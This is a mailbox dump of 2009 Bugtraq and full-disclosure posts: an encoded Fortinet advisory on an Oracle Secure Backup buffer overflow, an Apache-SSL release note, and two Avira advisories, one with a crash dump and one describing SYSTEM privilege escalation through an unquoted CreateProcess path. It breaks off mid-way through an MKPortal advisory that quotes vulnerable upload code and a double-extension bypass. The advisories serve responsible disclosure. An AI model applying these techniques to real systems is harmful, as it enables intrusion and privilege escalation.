List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 4088 invoked from network); 15 Jan 2009 08:59:48 -0000
Message-Id: <200901150923.n0F9NbJp026543@smtp.fortinet.com>
Date: Thu, 15 Jan 2009 17:26:45 +0800
From: "noreply-secresearch@fortinet.com" <noreply-secresearch@fortinet.com>
To: "full-disclosure" <full-disclosure@lists.grok.org.uk>,
"bugtraq" <bugtraq@securityfocus.com>
Subject: Oracle Secure Backup NDMP_CONECT_CLIENT_AUTH Command Buffer Overflow Vulnerability
X-mailer: Foxmail 5.0 beta1 [cn]
Mime-Version: 1.0
Content-Type: text/plain;
charset="gb2312"
Content-Transfer-Encoding: base64
Status:   

T3JhY2xlIFNlY3VyZSBCYWNrdXAgTkRNUF9DT05FQ1RfQ0xJRU5UX0FVVEggQ29tbWFuZCBCdWZm
ZXIgT3ZlcmZsb3cgVnVsbmVyYWJpbGl0eQ0KMjAwOS5KYW51YXJ5LjEzDQoNCkZvcnRpbmV0J3Mg
Rm9ydGlHdWFyZCBHbG9iYWwgU2VjdXJpdHkgUmVzZWFyY2ggVGVhbSBEaXNjb3ZlcnMgVnVsbmVy
YWJpbGl0eSBpbiBPcmFjbGUgU2VjdXJlIEJhY2t1cA0KDQpTdW1tYXJ5Og0KPT09PT09PT0NCg0K
QSBCdWZmZXIgT3ZlcmZsb3cgdnVsbmVyYWJpbGl0eSBleGlzdHMgT3JhY2xlIFNlY3VyZSBCYWNr
dXAgMTAuMi4wLjIgdGhyb3VnaCBhIG1hbGZvcm1lZCBORE1QIHBhY2tldC4NCg0KSW1wYWN0Og0K
PT09PT09PQ0KDQpSZW1vdGUgQ29kZSBFeGVjdXRpb24NCg0KUmlzazoNCj09PT09DQoNCkNyaXRp
Y2FsIChCYXNlIFNjb3JlOjEwLjApDQoNCkFmZmVjdGVkIFNvZnR3YXJlOg0KPT09PT09PT09PT09
PT09PT09DQoNCk9yYWNsZSBTZWN1cmUgQmFja3VwIDEwLjIuMC4yDQoNCkFkZGl0aW9uYWwgSW5m
b3JtYXRpb246DQo9PT09PT09PT09PT09PT09PT09PT09PQ0KDQpTZW5kaW5nIGEgbWFsZm9ybWVk
IE5ETVAgY2xpZW50IGF1dGhlbnRpY2F0aW9uKE5ETVBfQ09ORUNUX0NMSUVOVF9BVVRIIENvbW1h
bmQpIHBhY2tldCB3aWxsIGNhdXNlIGEgb3ZlcmZsb3cgYSBidWZmZXIgb3ZlcmZsb3cgZHVlIHRv
IA0KaW52YWxpZCBib3VuZHMgY2hlY2tpbmcuDQoNClNvbHV0aW9uczoNCj09PT09PT09PT0NCg0K
VXNlIHRoZSBzb2x1dGlvbiBwcm92aWRlZCBieSBPcmFjbGUgaHR0cDovL3d3dy5vcmFjbGUuY29t
L3RlY2hub2xvZ3kvZGVwbG95L3NlY3VyaXR5L2NyaXRpY2FsLXBhdGNoLXVwZGF0ZXMvY3B1amFu
MjAwOS5odG1sDQoNClRoZSBGb3J0aUd1YXJkIEdsb2JhbCBTZWN1cml0eSBSZXNlYXJjaCBUZWFt
IHJlbGVhc2VkIGEgc2lnbmF0dXJlICJPcmFjbGUuTkRNUC5DT05ORUNULkNMSUVOVC5BVVRILlVz
ZXIuSUQuQnVmZmVyLk92ZXJmbG93IiBvbiBKYW4gMTMgMjAwOSwgd2hpY2ggY292ZXJzIA0KdGhp
cyBzcGVjaWZpYyB2dWxuZXJhYmlsaXR5Lg0KDQpGb3J0aW5ldCBjdXN0b21lcnMgd2hvIHN1YnNj
cmliZSB0byBGb3J0aW5ldKGvcyBpbnRydXNpb24gcHJldmVudGlvbiAoSVBTKSBzZXJ2aWNlIHNo
b3VsZCBiZSBwcm90ZWN0ZWQgYWdhaW5zdCB0aGlzIFJlbW90ZSBDb2RlIEV4ZWN1dGlvbiBWdWxu
ZXJhYmlsaXR5LiBGb3J0aW5ldKGvcyBJUFMgc2VydmljZSBpcyBvbmUgY29tcG9uZW50IG9mIEZv
cnRpR3VhcmQgU3Vic2NyaXB0aW9uIFNlcnZpY2VzLCB3aGljaCBhbHNvIG9mZmVyIGNvbXByZWhl
bnNpdmUgc29sdXRpb25zIHN1Y2ggYXMgYW50aXZpcnVzLCBXZWIgY29udGVudCBmaWx0ZXJpbmcg
YW5kIGFudGlzcGFtIGNhcGFiaWxpdGllcy4gVGhlc2Ugc2VydmljZXMgZW5hYmxlIHByb3RlY3Rp
b24gYWdhaW5zdCB0aHJlYXRzIG9uIGJvdGggYXBwbGljYXRpb24gYW5kIG5ldHdvcmsgbGF5ZXJz
LiBGb3J0aUd1YXJkIFNlcnZpY2VzIGFyZSBjb250aW51b3VzbHkgdXBkYXRlZCBieSB0aGUgRm9y
dGlHdWFyZCBHbG9iYWwgU2VjdXJpdHkgUmVzZWFyY2ggVGVhbSwgd2hpY2ggZW5hYmxlcyBGb3J0
aW5ldCB0byBkZWxpdmVyIGEgY29tYmluYXRpb24gb2YgbXVsdGktbGF5ZXJlZCBzZWN1cml0eSBp
bnRlbGxpZ2VuY2UgYW5kIHRydWUgemVyby1kYXkgcHJvdGVjdGlvbiBmcm9tIG5ldyBhbmQgZW1l
cmdpbmcgdGhyZWF0cy4gVGhlc2UgdXBkYXRlcyBhcmUgZGVsaXZlcmVkIHRvIGFsbCBGb3J0aUdh
dGUsIEZvcnRpTWFpbCBhbmQgRm9ydGlDbGllbnQgcHJvZHVjdHMuIEZvcnRpbmV0IHN0cmljdGx5
IGZvbGxvd3MgcmVzcG9uc2libGUgZGlzY2xvc3VyZSBndWlkZWxpbmVzIHRvIGVuc3VyZSBvcHRp
bXVtIHByb3RlY3Rpb24gZHVyaW5nIGEgdGhyZWF0J3MgbGlmZWN5Y2xlLg0KDQpBY2tub3dsZWRn
ZW1lbnQ6DQo9PT09PT09PT09PT09PT09DQoNClpoZW5odWFsaXUgYW5kIFhpYW9wZW5nWmhhbmcg
b2YgRm9ydGluZXQncyBGb3J0aUd1YXJkIEdsb2JhbCBTZWN1cml0eSBSZXNlYXJjaCBUZWFtDQoN
ClJlZmVyZW5jZXM6DQo9PT09PT09PT09PQ0KDQpodHRwOi8vd3d3LmZvcnRpZ3VhcmRjZW50ZXIu
Y29tL2Fkdmlzb3J5L0ZHQS0yMDA5LTAyLmh0bWwNCmh0dHA6Ly93d3cub3JhY2xlLmNvbS90ZWNo
bm9sb2d5L2RlcGxveS9zZWN1cml0eS9jcml0aWNhbC1wYXRjaC11cGRhdGVzL2NwdWphbjIwMDku
aHRtbA0KDQpDVkUgSUQ6IENWRS0yMDA4LTU0NDQNCmh0dHA6Ly93d3cuY3ZlLm1pdHJlLm9yZy9j
Z2ktYmluL2N2ZW5hbWUuY2dpP25hbWU9MjAwOC01NDQ0DQoNCg0K
CioqKiBUaGlzIGVtYWlsIGFuZCBhbnkgYXR0YWNobWVudHMgdGhlcmV0byBtYXkgY29udGFpbiBw
cml2YXRlLCBjb25maWRlbnRpYWwsIGFuZCBwcml2aWxlZ2VkIG1hdGVyaWFsIGZvciB0aGUgc29s
ZSB1c2Ugb2YgdGhlIGludGVuZGVkIHJlY2lwaWVudC4gIEFueSByZXZpZXcsIGNvcHlpbmcsIG9y
IGRpc3RyaWJ1dGlvbiBvZiB0aGlzIGVtYWlsIChvciBhbnkgYXR0YWNobWVudHMgdGhlcmV0bykg
Ynkgb3RoZXJzIGlzIHN0cmljdGx5IHByb2hpYml0ZWQuICBJZiB5b3UgYXJlIG5vdCB0aGUgaW50
ZW5kZWQgcmVjaXBpZW50LCBwbGVhc2UgY29udGFjdCB0aGUgc2VuZGVyIGltbWVkaWF0ZWx5IGFu
ZCBwZXJtYW5lbnRseSBkZWxldGUgdGhlIG9yaWdpbmFsIGFuZCBhbnkgY29waWVzIG9mIHRoaXMg
ZW1haWwgYW5kIGFueSBhdHRhY2htZW50cyB0aGVyZXRvLiAqKioK

From - Thu Jan 15 12:42:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000059f7
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39195-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id E19EAED8CA
for <lists@securityspace.com>; Thu, 15 Jan 2009 12:40:01 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id F02BF23705B; Thu, 15 Jan 2009 08:44:35 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 7587 invoked from network); 15 Jan 2009 12:32:23 -0000
X-Authentication-Warning: smtp1.thebunker.net: Host 78-105-4-70.zone3.bethere.co.uk [78.105.4.70] claimed to be [10.241.6.194]
Message-ID: <496F326E.7050206@algroup.co.uk>
Date: Thu, 15 Jan 2009 12:56:14 +0000
From: Adam Laurie <adam@algroup.co.uk>
User-Agent: Thunderbird 2.0.0.18 (X11/20081125)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: ANNOUNCE: apache_1.3.41+ssl_1.60 released
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: ClamAV 0.94.2/8868/Thu Jan 15 06:34:41 2009 on irate.thebunker.net
X-Virus-Status: Clean
X-Spam-Status: No, score=0.7 required=5.0 tests=AWL,BAYES_40,RDNS_DYNAMIC,
SPF_FAIL autolearn=no version=3.2.5
X-Spam-Checker-Version: SpamAssassin 3.2.5 (2008-06-10) on irate.thebunker.net
Status:   

 From CHANGES.SSL:

Changed with Apache-SSL 1.3.41/1.60

   *) For some reason I switched on renegotiation, which broke
      things. For now, switched back off.
      [Ben Laurie]

The release will take a while to find it's way to mirrors, which can 
themselves be found here:

http://www.apache-ssl.org/

cheers,
Adam
-- 
Adam Laurie                         Tel: +44 (0) 20 7993 2690
Suite 117                           Fax: +44 (0) 1308 867 949
61 Victoria Road
Surbiton
Surrey                              mailto:adam@algroup.co.uk
KT6 4JX                             http://rfidiot.org

From - Thu Jan 15 12:52:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000059f8
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39196-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 5D65EED8EC
for <lists@securityspace.com>; Thu, 15 Jan 2009 12:49:16 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 7BB9E23707B; Thu, 15 Jan 2009 08:45:07 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 10035 invoked from network); 15 Jan 2009 14:49:15 -0000
Resent-Cc: recipient list not shown: ;
Resent-Date: Thu, 15 Jan 2009 08:13:10 -0700
Resent-Message-Id: <200901151513.n0FFDAhE022787@mx1.securityfocus.com>
Date: Thu, 15 Jan 2009 16:13:07 +0100
From: Thierry Zoller <Thierry@Zoller.lu>
Organization: Kachkeis CoKG
X-Priority: 3 (Normal)
Message-ID: <1734516223.20090115161307@Zoller.lu>
To: NTBUGTRAQ <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>,
bugtraq <bugtraq@securityfocus.com>,
full-disclosure <full-disclosure@lists.grok.org.uk>,
<vuln@secunia.com>, <cert@cert.org>, <nvd@nist.gov>, <cve@mitre.org>,
<vulndb@securityfocus.com>
Subject: Errata: [TZO-2009-1] Avira Antivir - RAR - Division by Zero &  Null Pointer Dereference
Resent-From: Thierry Zoller <Thierry@Zoller.lu>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-15
Content-Transfer-Encoding: 8bit
X-Originating-IP: 91.50.111.156
Status:   

Errata :

Products listed but not affected :
AVIRA WebProtector for KEN! - Reason: Does not use the Scan Engine
Avira AntiVir Mobile - Reason: Does not use the same AV Engine

Avira requested the following products to be removed from the list,
for the reason that they are license models and not products per se,
it is arguable whether they should be listed or not, since the
licenses (most likely) include the vulnerable products:

AVIRA WebGate Suite - Reason: is a License Model
AVIRA SmallBusiness Suite -> Reason: is a License Model
AVIRA Business Bundle -> Reason: is a License Model
AVIRA AntiVir NetWork Bundle -> Reason: is a License Model
AVIRA AntiVir NetGate Bundle -> Reason: is a License Model
AVIRA AntiVir GateWay Bundle -> Reason: is a License Model
AVIRA AntiVir Campus (for Education) -> Reason: is a License Model

List of undisputed affected products :

Avira Antivr Free
Avira AntiVir Premium
Avira Premium Security Suite
Avira AntiVir Professional
Avira AntiVir for KEN! 4
Avira AntiVir SharePoint
Avira AntiVir Virus Scan Adapter for SAP NetWeaver
Avira AntiVir MailGate
Avira MailGate Suite
Avira AntiVir Exchange
Avira AntiVir MIMEsweeper
Avira AntiVir Domino
Avira AntiVir WebGate
Avira WebGate Suite
Avira AntiVir ISA Server
Avira AntiVir MIMEsweeper



______________________________________________________________________

     Avira - RAR -Division by Zero & Null Pointer Dereference
______________________________________________________________________

Reference     : [TZO-2009-1]-Avira Antivir
Location      : http://blog.zoller.lu/2009/01/advisory-tzo-2009-1-avira-antivir-rar.html
Products      : Avira Antivr Free
                Avira AntiVir Premium
                Avira Premium Security Suite
                Avira AntiVir Professional
                Avira AntiVir for KEN! 4
                Avira AntiVir SharePoint
                Avira AntiVir Virus Scan Adapter for SAP NetWeaver
                Avira AntiVir MailGate
                Avira MailGate Suite
                Avira AntiVir Exchange
                Avira AntiVir MIMEsweeper
                Avira AntiVir Domino
                Avira AntiVir WebGate
                Avira WebGate Suite
                Avira AntiVir ISA Server
                Avira AntiVir MIMEsweeper
                                
Vendors and Products using the Avira Engine :
Important : The impact of this flaw on those devices  has  not  been
tested nor confirmed to exist, there is however  reason  to  believe
that    the    flaw    existed    in    this    products     aswell.

http://www.avira.com/documents/utils/pdf/products/pi_system-integration_en.pdf

               AXIGEN Mail Server
               Clearswift Mimesweeper
               GeNUGate and GeNUGate Pro (optional addon)
               IQ.Suite                 

Vendor        : http://www.avira.de



I. Background
~~~~~~~~~~~~~
Avira is a leading worldwide provider of  self-developed  protection
solutions for professional and private use. The company  belongs  to
the pioneers in this  sector  with  over  twenty  years  experience.

The protection experts have numerous  company  locations  throughout
Germany and cultivate partnerships in  Europe,   Asia  and  America.
Avira has more than 180 employees at their main office  in  Tettnang
near Lake Constance and is one  of  the  largest  employers  in  the
region.  There  are  around  250  people  employed  worldwide  whose
commitment is continually being confirmed by awards.  A  significant
contribution to protection is the Avira AntiVir  Personal  which  is
being  used  by   private    users    a    million    times    over.

AV-Comparatives e.V.  have  chosen  Avira  AntiVir  Premium  as  the
best anti-virus solution of 2008 

II. Description
~~~~~~~~~~~~~~~
By manipulating certain fields inside a  RAR  archive  and  attacker
might trigger division by zero and null point exceptions. The attack vector  should  be  rated as  remote  as  an  attachement  to    an    e-mail    is    enough.

*Anybody  else  noticed  that  the  amount  of  details   in    most
advisories have *become less than usefull ?*


III. Impact
~~~~~~~~~~~~~~~
In some cases the  impact  is  a  Denial  of  Service  condition  in
others to an invalid read size  of  4  bytes  which  again  in  some
cases lead to an null pointer dereference.

The RAR parser inside the  module  leads  to  various  errors  whose
exploitability index is rated "I don't have time for this now  -  so
let's say 'maybe'" also sometimes known as "I lack the  time  and/or
the skill to do so". 


FAULTING_IP: 
aepack!module_get_api+20ed9
0131cad9 8b10            mov     edx,dword ptr [eax]

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 0131cad9 (aepack!module_get_api+0x00020ed9)
   ExceptionCode: c0000005 (Access violation)
   ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 00000268
Attempt to read from address 00000268

FAULTING_THREAD:  00000144
DEFAULT_BUCKET_ID:  INVALID_POINTER_READ

PROCESS_NAME:  avscan.exe
OVERLAPPED_MODULE: Address regions for 'AVREP' and 'rcimage.dll' overlap

READ_ADDRESS:  00000268 
BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_READ_CORRUPT_MODULELIST_OVERLAPPED_MODULE
LAST_CONTROL_TRANSFER:  from 0131cb8c to 0131cad9

STACK_TEXT:  

0194f5fc 0131cb8c 0115bbfc 00000003 00000100 aepack!module_get_api+0x20ed9
0194f618 01319b96 0115bbfc 074cc4f4 00000002 aepack!module_get_api+0x20f8c
0194f654 0131a45a 00000010 01157160 00000001 aepack!module_get_api+0x1df96
0194f668 0131e7e0 000000d4 00f48ba8 011530d0 aepack!module_get_api+0x1e85a
0194f68c 01318c35 01157160 00000010 011530d0 aepack!module_get_api+0x22be0
00000000 00000000 00000000 00000000 00000000 aepack!module_get_api+0x1d035

FOLLOWUP_IP: 
aepack!module_get_api+20ed9
0131cad9 8b10            mov     edx,dword ptr [eax]

SYMBOL_NAME:  aepack!module_get_api+20ed9
MODULE_NAME: aepack
IMAGE_NAME:  aepack.dll
STACK_COMMAND:  ~2s ; kb

FAILURE_BUCKET_ID:  INVALID_POINTER_READ_c0000005_aepack.dll!module_get_api
BUCKET_ID:  APPLICATION_FAULT_INVALID_POINTER_READ_CORRUPT_MODULELIST_OVERLAPPED_MODULE_aepack!module_get_api+20ed9


IV. Disclosure Timeline
~~~~~~~~~~~~~~~~~~~~~~~~
The    Vulnerability    notification    policy    i    adhere    to:
http://blog.zoller.lu/search/label/Vulnerability%20disclosure%20Policy

 
17/12/2008  :  Sent  notice   to    the    correct    mail    adress
security@avira. com

17/12/2008 : Avira achknowledges receipt 

17/12/2008 : Avira sends details of  the  root  cause  on  the  same
day "The  crash  occurs  in  a  heavily  corrupted,   generated  RAR
archive while extracting the contents of the 22nd  file.   We  can't
give  any  file  names  as  they  are  non-printable  characters.  "

13/01/2009 : Avira notifies me that the  issue  was  fixed  with  an
update that shipped with AVPack 8.1.3.5  on  the  09/01/2009

14/01/2009 : Avira states  that  all  products  have  been  affected
except  "Securityy  Management  Center"  and  the  "Internet  Update
Manager". "Das bedeutet im Prinzip wirklich alle  Produkte,   ausser
Produkte wie eben das Security Management Center oder  der  Internet
Update Manager"

14/01/2009 : Release of this advisory 


Thierry Zoller
http://blog.zoller.lu

From - Thu Jan 15 15:42:48 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000059fa
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39197-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 2A9A5ED928
for <lists@securityspace.com>; Thu, 15 Jan 2009 15:38:02 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 282FC236F43; Thu, 15 Jan 2009 13:21:02 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 19896 invoked from network); 15 Jan 2009 17:19:27 -0000
Resent-Cc: recipient list not shown: ;
Resent-Date: Thu, 15 Jan 2009 10:43:24 -0700
Resent-Message-Id: <200901151743.n0FHhOXJ003903@mx2.securityfocus.com>
Date: Thu, 15 Jan 2009 18:43:00 +0100
From: Thierry Zoller <Thierry@Zoller.lu>
Organization: Kachkeis CoKG
X-Priority: 3 (Normal)
Message-ID: <151212550.20090115184300@Zoller.lu>
To: NTBUGTRAQ <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>,
bugtraq <bugtraq@securityfocus.com>,
full-disclosure <full-disclosure@lists.grok.org.uk>,
<info@circl.etat.lu>, <vuln@secunia.com>, <cert@cert.org>,
<nvd@nist.gov>, <cve@mitre.org>
Subject: [TZO-2009-2] Avira Antivir - Priviledge escalation
Resent-From: Thierry Zoller <Thierry@Zoller.lu>
MIME-Version: 1.0
Content-Type: text/plain; charset=windows-1252
Content-Transfer-Encoding: quoted-printable
X-Originating-IP: 91.50.111.156
Status:   

___________________________________________________________________

From  the 'cover-your-basics' and from the 'they-still-exist-department'
   Antivir insecure CreateProcess() usage - Privilege Esclation
                 and autostart as free bonus
___________________________________________________________________

Reference     : [TZO-2009-2]-Avira Antivir Priviledge escalation
WWW           : http://blog.zoller.lu/2009/01/tzo-2009-2-avira-antivir-priviledge.html
Product       : AV7/AV8 desktop products :
                - Avira AntiVir Premium
                - Avira Premium Security Suite
                - Avira AntiVir Professional
Vendor        : http://www.avira.de


I. Background
~~~~~~~~~~~~~
Avira AntiVir is a reliable  free  antivirus  solution,   that
constantly and  rapidly  scans  your  computer  for  malicious
programs such as viruses, Trojans, backdoor programs,  hoaxes,
worms, dialers etc. Monitors  every  action  executed  by  the
user or the  operating  system  and  reacts  promptly  when  a
malicious program is detected.

The  protection  experts  have  numerous  company    locations
throughout  Germany  and  cultivate  partnerships  in  Europe,
Asia and America. Avira has more than 180 employees  at  their
main office in Tettnang near Lake  Constance  and  is  one  of
the largest employers in the region.   There  are  around  250
people employed  worldwide  whose  commitment  is  continually
being confirmed by  awards.   A  significant  contribution  to
protection is the Avira AntiVir Personal which is  being  used
by private users a million times over.

AV-Comparatives e.V. have  chosen  Avira  AntiVir  Premium  as
the best anti-virus solution of 2008 


II. Description
~~~~~~~~~~~~~~~
No funky IOCTL just a plain unsafe  call  to  CreateProcess().
In detail, the  scheduler  (sched. exe)  running  with  SYSTEM
privileges calls the  CreateProcess()  API  without  enclosing
lpCommandLine  in  quotes  to  _regularly_  shell   avwsc.exe

Calling an executable with a path has spaces  in  it  and  not
using  quotes  will  trigger  windows  to  search   for    the
executable in various areas.

Calling for instance -  

 CreateProcess(
  NULL,
  c:\program files\avira\antivir PersonalEdition Classic\avwsc.exe,
  ...
  );
   
will first look for
c:\program.exe
and then
c:\program files\avira\antivir.exe

This is documented and intended behaviour as can be seen at : 
http://msdn.microsoft.com/en-us/library/ms682425.aspx

Quoting ms682425.aspx : 
The lpApplicationName parameter can be NULL. In that case,  
the module  name  must  be  the  first  white  spacedelimited
token in the lpCommandLine string. If you  are  using  a  long
file name that  contains  a  space,   use  quoted  strings  to
indicate where the file name ends  and  the  arguments  begin;
otherwise, the file name is ambiguous. For example,   consider
the string  "c:\program  files\sub  dir\program  name".   This
string can be interpreted in a number  of  ways.   The  system
tries to interpret the possibilities in the  following  order:


c:\program.exe files\sub dir\program name, c:\program files\sub.exe dir\program name
c:\program files\sub dir\program.exe name, c:\program files\sub dir\program name.exe 

Pre-conditions for a CreateProcess() call to be insecure :
- lpApplicationName contains a NULL 
- the path in lpCommandLine cotains white space 
- the path in lpCommandLine is not enclosed in quotation marks

III. Impact
~~~~~~~~~~~
- Elevation of privileges from USER to SYSTEM  is  possible  
by  writing the payload  to c:\program files\avira\antivir.exe    
- Autostart vector - The payload will be executed even  after 
a reboot

IV. Disclosure Timeline
~~~~~~~~~~~~~~~~~~~~~~~~
28/09/2008 : Contacted and send bug report to Avira
28/09/2008 : Avira acknowledges receipt
01/10/2008 : Avira notifies me that the issue will be fixed 
             with there next Emergency Update (EU2)
24/10/2008 : The update is pushed to customers
24/10/2008 : Avira notifies me that credits have been posted 
here: http://www1.avira.com/en/support/faq/details.html?id=419             
15/01/2009 : Release of this advisory


References :
[1] http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038789.html
[2] CreateProcess() - http://msdn.microsoft.com/en-us/library/ms682425.aspx
[3] Book: Fuzzing - Brute force vulnerability discovery
[4] Loadlibrary() -  http://msdn.microsoft.com/en-us/library/ms684175(VS.85).aspx
If the string does not specify a path, the function uses a standard search strategy to find the file.


From - Thu Jan 15 15:52:49 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000059fb
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39198-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id C0DB5ED8A2
for <lists@securityspace.com>; Thu, 15 Jan 2009 15:50:13 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 71405237074; Thu, 15 Jan 2009 13:21:57 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 25568 invoked from network); 15 Jan 2009 18:39:15 -0000
Date: Thu, 15 Jan 2009 11:43:55 -0700
Message-Id: <200901151843.n0FIhtOS024799@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: come2waraxe@yahoo.com
To: bugtraq@securityfocus.com
Subject: [waraxe-2009-SA#070] - Multiple Vulnerabilities in MKPortal <= 1.2.1
Status:   

[waraxe-2009-SA#070] - Multiple Vulnerabilities in MKPortal <= 1.2.1
=============================================================================
Author: Janek Vind "waraxe"
Date: 15. January 2009
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-70.html


Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

MKPortal is a free Portal/Content Management System (CMS) which seamlessly
integrates with the most popular forum softwares. It uses the forum user
management system and other features and adds many powerful modules to create
and manage a light but powerful web site. MKPortal has an intuitive user
interface and is very simple to install and administer.

Homepage: http://www.mkportal.it/


List of found vulnerabilities
==============================================================================
1. Insecure file upload in blog personal gallery
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: critical
Preconditions:
 1. attacker must be registered user
 2. attacker must have blog editing privileges

Registered users with blog keeping privileges can access personal gallery
functionality, example URL:

http://localhost/mkportal.1.2.1/index.php?ind=blog&op=p_gal

They can also upload image files to the server. File uploading can be
dangerous without proper security checks. So let's have a closer look
at the source code of "modules/blog/index.php" line ~2452: 

---------------------[source code]---------------------
function upload_imm () {
global $mkportals, $DB, $mklib, $Skin, $_FILES;

..
$file =  $_FILES['FILE_UPLOAD']['tmp_name'];
$file_name =  $_FILES['FILE_UPLOAD']['name'];
//$file_type =  $_FILES['FILE_UPLOAD']['type'];
$peso =  $_FILES['FILE_UPLOAD']['size'];

if (!$file) {
$message = "{$mklib->lang['b_compfile']}";
$mklib->error_page($message);
exit;
}

//Validate file extension
$file_ext = preg_replace("`.*\.(.*)`", "\\1", $file_name);
$file_ext = substr ($file_name, (strlen($file_name)-3), 3);
$file_ext = strtolower($file_ext);

switch($file_ext)
{
case 'gif':
$ext = 'gif';
break;
case 'jpg':
$ext = 'jpg';
break;
case 'png':
$ext = 'png';
break;
case 'tif':
$ext = 'tif';
break;
case 'bmp':
$ext = 'bmp';
break;
default:
$ext = 'not_supported';
break;
}
if ($ext == "not_supported")  {
$message = "{$mklib->lang['b_gnotsup']}";
$mklib->error_page($message);
exit;
}

--------------------[/source code]---------------------

So this piece of code suppose to be let in only files with specific extensions.
In reality it will pass through files like "foobar.agif" or "whatever.pbmp ...
Let's assume, that we have jpg picture named "pic.php.jjpg". This can be valid
picture file and in same time contain malicious php code inside.

What happens next:

---------------------[source code]---------------------
//Move file from server tmp directory to blog "tmp" directory
if (!move_uploaded_file("$file", "mkportal/blog/images/tmp/$file_name")) {
$message = "{$mklib->lang['b_nopermupl']}";
$mklib->error_page($message);
exit;
}
@chmod("mkportal/blog/images/tmp/$file_name", 0644);

//Validate by mime type
$tmpfilename = "mkportal/blog/images/tmp/$file_name";
